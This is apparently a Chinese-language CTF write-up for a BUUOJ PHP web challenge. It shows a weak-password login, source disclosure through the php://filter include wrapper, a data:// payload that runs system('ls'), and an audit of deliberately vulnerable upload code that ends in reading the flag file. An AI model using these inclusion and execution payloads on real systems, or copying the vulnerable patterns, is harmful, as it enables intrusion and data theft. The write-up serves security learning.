进入题目页面如下
是一个登陆界面,尝试万能密码登录
当输入带有符号的用户名时,提示用户不存在,那尝试
弱口令密码
用户名:admin
密码:password
可以,登陆上去了,页面如下
难道是文件上传?
上传了一句话木马的文件并没有显示上传成功及文件路径,上传带有木马的图片转化成了文本且显示太大了
应该换个思路
发现URL里有传参?file=upload
想要获取源码,猜测需要构造伪协议
构造伪协议
1、home.php
php
http//:a6e52924-fe4f-43a7-8bec-59cf51b383c6.node5.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=home2、upload.php
php
http//:a6e52924-fe4f-43a7-8bec-59cf51b383c6.node5.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=upload伪协议知识点
在 Web 安全测试和开发过程中,有时候需要利用伪协议来获取目标文件的源码
PHP 环境下的伪协议利用
1. php://filter 伪协议
- 原理 :
php://filter伪协议允许你在读取文件内容之前对其进行过滤,例如进行 base64 编码,这样可以绕过一些文件包含的限制,并且避免直接执行文件中的代码。 - 假设存在一个文件包含漏洞,目标代码如下
php
<?php
$file = $_GET['file'];
include($file);
?>可以构造如下 URL 来获取目标文件的源码
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=target_file.php- 解释 :
php://filter是伪协议的名称。read=convert.base64-encode表示对读取的文件内容进行 base64 编码。resource=target_file.php指定要读取的目标文件。
获取到 base64 编码后的内容后,在本地进行解码即可得到目标文件的源码。
2. data://text/plain 伪协议
-
原理 :
data://text/plain伪协议允许你直接在 URL 中嵌入数据,并将其作为文件内容进行处理。 -
针对上述文件包含漏洞,可以构造如下 URL
http://example.com/index.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyAiKTs/Pg==
这里 PD9waHAgc3lzdGVtKCJscyAiKTs/Pg== 是 <?php system("ls ");?> 的 base64 编码。
- 解释 :
data://text/plain是伪协议名称。;base64表示后面的数据是经过 base64 编码的。- 编码后的数据就是要执行或包含的内容。
Java 环境下的伪协议利用
1. jar: 伪协议
-
原理 :
jar:伪协议可以用来访问 JAR 文件中的资源。在一些存在文件包含或资源加载漏洞的 Java 应用中,可以利用该伪协议来获取 JAR 文件中的源码。 -
假设存在一个 Java 应用,通过
URLClassLoader加载外部资源,攻击者可以构造如下 URL:jar:file:/path/to/your.jar!/com/example/YourClass.class
-
解释 :
jar:是伪协议名称。file:/path/to/your.jar指定 JAR 文件的路径。!/com/example/YourClass.class指定 JAR 文件中要访问的具体类文件。
利用伪协议获得home.php和upload.php的源码
访问后得到的页面如下
需要对以上base64编码解码,可以使用下面这个在线工具
base64解码 base64编码 在线base64解码/编码工具 iP138在线工具
按以上方法获得home.php和upload.php的源码
1、home.php源码
php
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
if(isset($_GET['file'])){
if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
die("hacker!");
}
else{
if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
$file = $_GET['file'].".php";
}
else{
$file = $_GET['file'].".fxxkyou!";
}
echo "当前引用的是 ".$file;
require $file;
}
}
else{
die("no permission!");
}
}
?>2、upload.php源码
php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<form action="" method="post" enctype="multipart/form-data">
上传文件
<input type="file" name="file" />
<input type="submit" name="submit" value="上传" />
</form>
<?php
error_reporting(0);
class Uploader{
public $Filename;
public $cmd;
public $token;
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
$this->token = $_SESSION['user'];
}
function upload($file){
global $sandbox;
global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (′▽`〃)');";
}
else{
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
function __toString(){
global $sandbox;
global $ext;
// return $sandbox.$this->Filename.$ext;
return $this->Filename;
}
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
if(@file_get_contents($uploader)){
echo "下面是你上传的文件:<br>".$uploader."<br>";
echo file_get_contents($uploader);
}
}
?>
代码审计
类 Uploader:
构造函数 __construct:
生成一个沙盒目录,路径为当前工作目录下的 uploads 文件夹,以用户会话中的 user 值的 MD5 哈希命名。
若 _GET\['name'\] 存在且不包含特定的危险字符串(如 data://、filter://、php:// 或 .),则将其赋值给 Filename;否则,使用沙盒目录和用户会话中的 user 值加上 .txt 扩展名作为文件名。
初始化 cmd 为一个提示信息,token 为用户会话中的 user 值。
方法 upload:
若 Filename 包含非字母数字字符,将 cmd 设置为输出非法文件名的错误信息。
若上传文件大小超过 1024 字节,将 $cmd 设置为输出文件过大的错误信息。
若以上条件都不满足,将 $cmd 设置为使用 move_uploaded_file 函数将上传文件移动到指定位置的代码。
魔术方法 __toString:返回 $Filename 的值。
析构函数 __destruct:
检查 token 是否与用户会话中的 user 值相等,若不相等,将 cmd 设置为输出令牌检查失败的错误信息。
执行 $cmd 中的代码。
主程序逻辑:
若存在上传文件,创建 Uploader 对象并调用 upload 方法处理上传文件。
尝试读取上传文件的内容,若成功则输出文件路径和内容。
重点看以下代码
有file_get_contents($uploader)函数,这是一个读取文件的函数,猜测可以读取flag文件,通过修改Filename参数来读取flag信息
构造payload如下
php
http://7273c8cf-da67-4fc9-b0e5-8a1691cef3f8.node5.buuoj.cn:81/home.php?file=upload&name=/var/www/html/flag.php访问后,上传一个按照规定内的文件,最后利用burpsuite抓包,得到flag
